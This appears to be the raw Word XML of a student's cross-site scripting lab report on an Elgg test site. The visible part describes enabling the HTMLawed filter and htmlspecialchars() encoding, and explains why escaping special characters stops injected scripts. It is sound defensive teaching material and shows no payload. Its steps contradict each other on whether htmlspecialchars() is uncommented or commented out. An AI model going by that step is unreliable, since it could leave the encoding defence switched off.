        <w:t>Task 1: Activate only the HTMLawed 1.8 countermeasure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC38DF" w14:textId="5201AD67" w:rsidR="0054600B" w:rsidRDefault="00736ABC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Step 1: Bob’s profile before turning on the HTMLawed 1.8 countermeasure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FCD116" w14:textId="2566378A" w:rsidR="00736ABC" w:rsidRDefault="00736ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7273EBE1" wp14:editId="2AF70FB2">
            <wp:extent cx="5943600" cy="31940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6B33AE75" w14:textId="77777777" w:rsidR="001370AA" w:rsidRDefault="001370AA"/>
    <w:p w14:paraId="5D6D6AEB" w14:textId="275E641F" w:rsidR="00736ABC" w:rsidRDefault="00736ABC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00B63307">
        <w:t xml:space="preserve">Log in as admin. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Turn on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>HTMLawed 1.8 countermeasure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A39BF" w14:textId="331F09D6" w:rsidR="00736ABC" w:rsidRDefault="00B63307">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EF9BFE" wp14:editId="09DDFB13">
            <wp:extent cx="5943600" cy="3221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87C262B" w14:textId="0AB4759E" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="4810F5F4" w14:textId="2A3F5455" w:rsidR="001370AA" w:rsidRDefault="001370AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidR="00C724DD">
        <w:t xml:space="preserve"> Bob’s profile after turn</w:t>
      </w:r>
      <w:r w:rsidR="008B77A6">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00C724DD">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00C724DD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C724DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>HTMLawed 1.8 countermeasure.</w:t>
      </w:r>
      <w:r w:rsidR="0013494C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD4C87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The script tags are </w:t>
      </w:r>
      <w:r w:rsidR="00504C4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>disabled.</w:t>
      </w:r>
      <w:r w:rsidR="000C2072">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore the malicious code is shown on the profile page but the code cannot execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0ECF5" w14:textId="2C7EE4CD" w:rsidR="0013494C" w:rsidRDefault="0013494C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="578BEE2E" wp14:editId="010C2BDA">
            <wp:extent cx="5943600" cy="4212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12590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E022E6" w14:textId="70D97D5E" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6181032A" w14:textId="77777777" w:rsidR="00A769BC" w:rsidRDefault="00A769BC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CFBF47" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549D958C" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709E636D" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0523E5FC" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C66F5B5" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43284173" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA29F3D" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3892B7D7" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2CD692" w14:textId="77777777" w:rsidR="00E958F0" w:rsidRDefault="00E958F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49595D6D" w14:textId="2EB53967" w:rsidR="00C724DD" w:rsidRDefault="004A2E7C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2: Turn on both countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7967E334" w14:textId="52BA35E0" w:rsidR="004A2E7C" w:rsidRDefault="004A2E7C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="00DF4285">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Charlie’s profile before turning on both countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1B2F5" w14:textId="4CD0982B" w:rsidR="00DF4285" w:rsidRDefault="00F746AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BDE44D2" wp14:editId="38A5E75B">
            <wp:extent cx="5943600" cy="3396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7067A95D" w14:textId="53D94A1F" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="1DD1334E" w14:textId="4EB5CDEE" w:rsidR="00856959" w:rsidRDefault="00F746AA">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:t xml:space="preserve">In addition to the </w:t>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">HTMLawed 1.8 </w:t>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>countermeaure,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:t>uncomment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the “htmlspecialchars()” PHP method</w:t>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:t xml:space="preserve"> in “dropdown.php”, “email.php”, “text.php”, and “url.php”</w:t>
      </w:r>
      <w:r w:rsidR="003E66BD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD727C" w14:textId="703867F5" w:rsidR="005D43C6" w:rsidRDefault="00856959">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04516421" wp14:editId="4BB7C7C6">
            <wp:extent cx="5943600" cy="14814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81455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000A0610">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD1EAB" w14:textId="5053D904" w:rsidR="00813DE9" w:rsidRDefault="00813DE9"/>
    <w:p w14:paraId="6A2ED6CC" w14:textId="77777777" w:rsidR="00A75C51" w:rsidRDefault="00A75C51"/>
    <w:p w14:paraId="0C99930B" w14:textId="77777777" w:rsidR="00A75C51" w:rsidRDefault="00A75C51"/>
    <w:p w14:paraId="02CF1D55" w14:textId="77777777" w:rsidR="00A75C51" w:rsidRDefault="00A75C51"/>
    <w:p w14:paraId="7A43E6A0" w14:textId="77777777" w:rsidR="00A75C51" w:rsidRDefault="00A75C51"/>
    <w:p w14:paraId="2ED02F8B" w14:textId="77777777" w:rsidR="00A75C51" w:rsidRDefault="00A75C51"/>
    <w:p w14:paraId="3EF917A4" w14:textId="51DD03B0" w:rsidR="00832D60" w:rsidRPr="00A42305" w:rsidRDefault="00832D60">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="0064459E">
        <w:t>Charlie’s profile after commenting out the “htmlspecialchars()” PHP method in the above files.</w:t>
      </w:r>
      <w:r w:rsidR="00A42305">
        <w:t xml:space="preserve"> Not only are the script tags disabled, the special characters in the input such as </w:t>
      </w:r>
      <w:r w:rsidR="00A42305" w:rsidRPr="00A42305">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:r w:rsidR="00A42305">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(“), less than (&lt;)</w:t>
      </w:r>
      <w:r w:rsidR="00A42305">
        <w:t xml:space="preserve"> are converted to special encodings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30FC46" w14:textId="3BB93C28" w:rsidR="0064459E" w:rsidRDefault="00A75C51">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7F0DFA" wp14:editId="0BC9C080">
            <wp:extent cx="5498075" cy="3118513"/>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5779" cy="3128555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C458BDE" w14:textId="73C63726" w:rsidR="0016785F" w:rsidRPr="00A75C51" w:rsidRDefault="0016785F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163E9F99" wp14:editId="24B6C147">
            <wp:extent cx="5486400" cy="39489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5472" cy="3955448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2AABF2EC" w14:textId="6B41DDFE" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="58EE5893" w14:textId="7A0A50B2" w:rsidR="0035795E" w:rsidRDefault="0035795E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Explanation why encoding the special characters avoids XSS attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6AB08" w14:textId="7CBB2B5F" w:rsidR="0035795E" w:rsidRPr="002370AF" w:rsidRDefault="004F70F8">
      <w:r>
        <w:t>Special</w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:t xml:space="preserve"> characters such as </w:t>
      </w:r>
      <w:r w:rsidR="00EC535E" w:rsidRPr="00EC535E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, &gt;, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are essential components of the malicious JavaScript code. For example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are used for tags, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is used for strings. If the special characters </w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r>
        <w:t>replaced by special encodings,</w:t>
      </w:r>
      <w:r w:rsidR="00EC535E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00660D9C">
        <w:t>then the JavaScript code won’t be valid and therefore cannot execute on the victim’s browser.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0035795E" w:rsidRPr="002370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39F"/>
    <w:rsid w:val="0000470A"/>
    <w:rsid w:val="00015148"/>
    <w:rsid w:val="00023B98"/>
    <w:rsid w:val="0002423A"/>
    <w:rsid w:val="00050AEF"/>
    <w:rsid w:val="0007364C"/>
    <w:rsid w:val="0008419F"/>
    <w:rsid w:val="00096A5F"/>
    <w:rsid w:val="000A0610"/>
    <w:rsid w:val="000A7FCE"/>
    <w:rsid w:val="000C2072"/>
    <w:rsid w:val="000C3D03"/>
    <w:rsid w:val="000D5234"/>
    <w:rsid w:val="000D6297"/>
    <w:rsid w:val="000F1D12"/>
    <w:rsid w:val="000F3CDB"/>
    <w:rsid w:val="00107B49"/>
    <w:rsid w:val="001175BD"/>
    <w:rsid w:val="00131BBD"/>
    <w:rsid w:val="0013239D"/>
    <w:rsid w:val="0013494C"/>
    <w:rsid w:val="001370AA"/>
    <w:rsid w:val="0014423A"/>
    <w:rsid w:val="0016123C"/>
    <w:rsid w:val="001670E6"/>
    <w:rsid w:val="0016785F"/>
    <w:rsid w:val="00185A59"/>
    <w:rsid w:val="001F2443"/>
    <w:rsid w:val="001F432C"/>
    <w:rsid w:val="00227F1B"/>
    <w:rsid w:val="002370AF"/>
    <w:rsid w:val="00261BB8"/>
    <w:rsid w:val="00277D57"/>
    <w:rsid w:val="002932D3"/>
    <w:rsid w:val="002A15B6"/>
    <w:rsid w:val="002D0484"/>
    <w:rsid w:val="002D2AD5"/>
    <w:rsid w:val="00301763"/>
    <w:rsid w:val="00307AED"/>
    <w:rsid w:val="0032274D"/>
    <w:rsid w:val="00327174"/>
    <w:rsid w:val="0035795E"/>
    <w:rsid w:val="003712CD"/>
    <w:rsid w:val="00390195"/>
    <w:rsid w:val="003B44AA"/>
    <w:rsid w:val="003D7B34"/>
    <w:rsid w:val="003E0093"/>
    <w:rsid w:val="003E2539"/>
    <w:rsid w:val="003E4713"/>
    <w:rsid w:val="003E66BD"/>
    <w:rsid w:val="003F138A"/>
    <w:rsid w:val="00410B55"/>
    <w:rsid w:val="00446C3E"/>
    <w:rsid w:val="00451A53"/>
    <w:rsid w:val="00461D39"/>
    <w:rsid w:val="00477F56"/>
    <w:rsid w:val="004A015D"/>
    <w:rsid w:val="004A2632"/>
    <w:rsid w:val="004A2E7C"/>
    <w:rsid w:val="004A4821"/>
    <w:rsid w:val="004C6C7B"/>
    <w:rsid w:val="004D0A75"/>
    <w:rsid w:val="004F1DF1"/>
    <w:rsid w:val="004F70F8"/>
    <w:rsid w:val="00504C4D"/>
    <w:rsid w:val="005208D1"/>
    <w:rsid w:val="00521B45"/>
    <w:rsid w:val="0052487C"/>
    <w:rsid w:val="00525F06"/>
    <w:rsid w:val="0054600B"/>
    <w:rsid w:val="005477F3"/>
    <w:rsid w:val="00557750"/>
    <w:rsid w:val="005638A4"/>
    <w:rsid w:val="005641F5"/>
    <w:rsid w:val="00574316"/>
    <w:rsid w:val="00577591"/>
    <w:rsid w:val="005C168B"/>
    <w:rsid w:val="005D3528"/>
    <w:rsid w:val="005D43C6"/>
    <w:rsid w:val="005D46B2"/>
    <w:rsid w:val="005D5C91"/>
    <w:rsid w:val="005E1113"/>
    <w:rsid w:val="005F2EB9"/>
    <w:rsid w:val="005F47DA"/>
    <w:rsid w:val="006143BE"/>
    <w:rsid w:val="00625191"/>
    <w:rsid w:val="00641A0B"/>
    <w:rsid w:val="00642687"/>
    <w:rsid w:val="0064459E"/>
    <w:rsid w:val="00655630"/>
    <w:rsid w:val="006575E1"/>
    <w:rsid w:val="00660D9C"/>
    <w:rsid w:val="006666AD"/>
    <w:rsid w:val="0067364B"/>
    <w:rsid w:val="00685656"/>
    <w:rsid w:val="0068655C"/>
    <w:rsid w:val="006B1EDD"/>
    <w:rsid w:val="006B554A"/>
    <w:rsid w:val="006C247F"/>
    <w:rsid w:val="006D6448"/>
    <w:rsid w:val="006E0DBF"/>
    <w:rsid w:val="006F270F"/>
    <w:rsid w:val="0070296E"/>
    <w:rsid w:val="00714ECF"/>
    <w:rsid w:val="0072344B"/>
    <w:rsid w:val="007253FF"/>
    <w:rsid w:val="00736ABC"/>
    <w:rsid w:val="007375B3"/>
    <w:rsid w:val="00755BF9"/>
    <w:rsid w:val="007655E7"/>
    <w:rsid w:val="00773395"/>
    <w:rsid w:val="00793CDF"/>
    <w:rsid w:val="00797917"/>
    <w:rsid w:val="007A6A52"/>
    <w:rsid w:val="007B34EA"/>
    <w:rsid w:val="007C3B6D"/>
    <w:rsid w:val="007C6353"/>
    <w:rsid w:val="008048CF"/>
    <w:rsid w:val="00813DE9"/>
    <w:rsid w:val="008202AD"/>
    <w:rsid w:val="008208F0"/>
    <w:rsid w:val="0083122F"/>
    <w:rsid w:val="00832527"/>
    <w:rsid w:val="00832D60"/>
    <w:rsid w:val="00856959"/>
    <w:rsid w:val="008962E0"/>
    <w:rsid w:val="008A028B"/>
    <w:rsid w:val="008A3B9F"/>
    <w:rsid w:val="008A4936"/>
    <w:rsid w:val="008A7C97"/>
    <w:rsid w:val="008B53A5"/>
    <w:rsid w:val="008B550F"/>
    <w:rsid w:val="008B77A6"/>
    <w:rsid w:val="008C4B99"/>
    <w:rsid w:val="008E481D"/>
    <w:rsid w:val="008F522F"/>
    <w:rsid w:val="008F6EA7"/>
    <w:rsid w:val="008F7409"/>
    <w:rsid w:val="0092227C"/>
    <w:rsid w:val="009633A7"/>
    <w:rsid w:val="00976FBF"/>
    <w:rsid w:val="00990711"/>
    <w:rsid w:val="0099639F"/>
    <w:rsid w:val="009A22C0"/>
    <w:rsid w:val="009B3324"/>
    <w:rsid w:val="009B3D93"/>
    <w:rsid w:val="009B4DE3"/>
    <w:rsid w:val="009C5E2B"/>
    <w:rsid w:val="009C7701"/>
    <w:rsid w:val="009D0BF1"/>
    <w:rsid w:val="00A06F54"/>
    <w:rsid w:val="00A22150"/>
    <w:rsid w:val="00A37393"/>
    <w:rsid w:val="00A37903"/>
    <w:rsid w:val="00A37E4E"/>
    <w:rsid w:val="00A42305"/>
    <w:rsid w:val="00A62743"/>
    <w:rsid w:val="00A75C51"/>
    <w:rsid w:val="00A7654A"/>
    <w:rsid w:val="00A769BC"/>
    <w:rsid w:val="00A853EE"/>
    <w:rsid w:val="00A91C02"/>
    <w:rsid w:val="00AB1B59"/>
    <w:rsid w:val="00AC2849"/>
    <w:rsid w:val="00AD29DF"/>
    <w:rsid w:val="00AD4C87"/>
    <w:rsid w:val="00AE486D"/>
    <w:rsid w:val="00AF4866"/>
    <w:rsid w:val="00B07898"/>
    <w:rsid w:val="00B16080"/>
    <w:rsid w:val="00B17053"/>
    <w:rsid w:val="00B3003A"/>
    <w:rsid w:val="00B35482"/>
    <w:rsid w:val="00B4407A"/>
    <w:rsid w:val="00B551B8"/>
    <w:rsid w:val="00B63307"/>
    <w:rsid w:val="00B733EC"/>
    <w:rsid w:val="00B8556D"/>
    <w:rsid w:val="00B86C84"/>
    <w:rsid w:val="00B95B04"/>
    <w:rsid w:val="00BB35A2"/>
    <w:rsid w:val="00BC1B46"/>
    <w:rsid w:val="00BD0036"/>
    <w:rsid w:val="00BD26B6"/>
    <w:rsid w:val="00BD7935"/>
    <w:rsid w:val="00BE71C1"/>
    <w:rsid w:val="00C00509"/>
    <w:rsid w:val="00C07DEB"/>
    <w:rsid w:val="00C55D04"/>
    <w:rsid w:val="00C70480"/>
    <w:rsid w:val="00C724DD"/>
    <w:rsid w:val="00C85F89"/>
    <w:rsid w:val="00C921F6"/>
    <w:rsid w:val="00C936DD"/>
    <w:rsid w:val="00CA169C"/>
    <w:rsid w:val="00CA42AC"/>
    <w:rsid w:val="00CA4960"/>
    <w:rsid w:val="00CE28F6"/>
    <w:rsid w:val="00CE4993"/>
    <w:rsid w:val="00CE6B96"/>
    <w:rsid w:val="00CF07C3"/>
    <w:rsid w:val="00D058AC"/>
    <w:rsid w:val="00D72595"/>
    <w:rsid w:val="00DB3972"/>
    <w:rsid w:val="00DB5EB0"/>
    <w:rsid w:val="00DC36E1"/>
    <w:rsid w:val="00DF4285"/>
    <w:rsid w:val="00E079D2"/>
    <w:rsid w:val="00E15B8D"/>
    <w:rsid w:val="00E26D68"/>
    <w:rsid w:val="00E34484"/>
    <w:rsid w:val="00E349AA"/>
    <w:rsid w:val="00E44B0B"/>
    <w:rsid w:val="00E606B3"/>
    <w:rsid w:val="00E73542"/>
    <w:rsid w:val="00E7738A"/>
    <w:rsid w:val="00E823AF"/>
    <w:rsid w:val="00E958F0"/>
    <w:rsid w:val="00E95A6F"/>
    <w:rsid w:val="00E97902"/>
    <w:rsid w:val="00EA4BFE"/>
    <w:rsid w:val="00EA7515"/>
    <w:rsid w:val="00EC535E"/>
    <w:rsid w:val="00EE690B"/>
    <w:rsid w:val="00EE6E8A"/>
    <w:rsid w:val="00F04EC8"/>
    <w:rsid w:val="00F06B46"/>
    <w:rsid w:val="00F4200E"/>
    <w:rsid w:val="00F42A42"/>
    <w:rsid w:val="00F448E9"/>
    <w:rsid w:val="00F52C16"/>
    <w:rsid w:val="00F54114"/>
    <w:rsid w:val="00F746AA"/>
    <w:rsid w:val="00F75EB4"/>
    <w:rsid w:val="00F76A92"/>
    <w:rsid w:val="00F77546"/>
    <w:rsid w:val="00F85575"/>
    <w:rsid w:val="00FA0EB9"/>
    <w:rsid w:val="00FD0593"/>
    <w:rsid w:val="00FF5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31043"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8E4F8899-3486-4FB6-A420-199B8BF75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85575"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F855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elgg.session.user.name/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xsslabelgg.com/action/profile/edit" TargetMode="Externa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hyperlink" Target="http://elgg.session.user.name/" TargetMode="External"/><Relationship Id="rId46"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www.xsslabelgg.com/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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xsslabelgg.com/"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8.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xsslabelgg.com/" TargetMode="External"/><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hyperlink" Target="http://www.xsslabelgg.com/action/friends/add?friend=47" TargetMode="External"/><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7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xsslabelgg.com/action/profile/edit"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0.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1710</TotalTime>
  <Pages>39</Pages>
  <Words>2128</Words>
  <Characters>12132</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>101</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14232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Jiyuan Lu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jiyuan Lu</cp:lastModifiedBy>
  <cp:revision>243</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-13T16:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-15T22:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>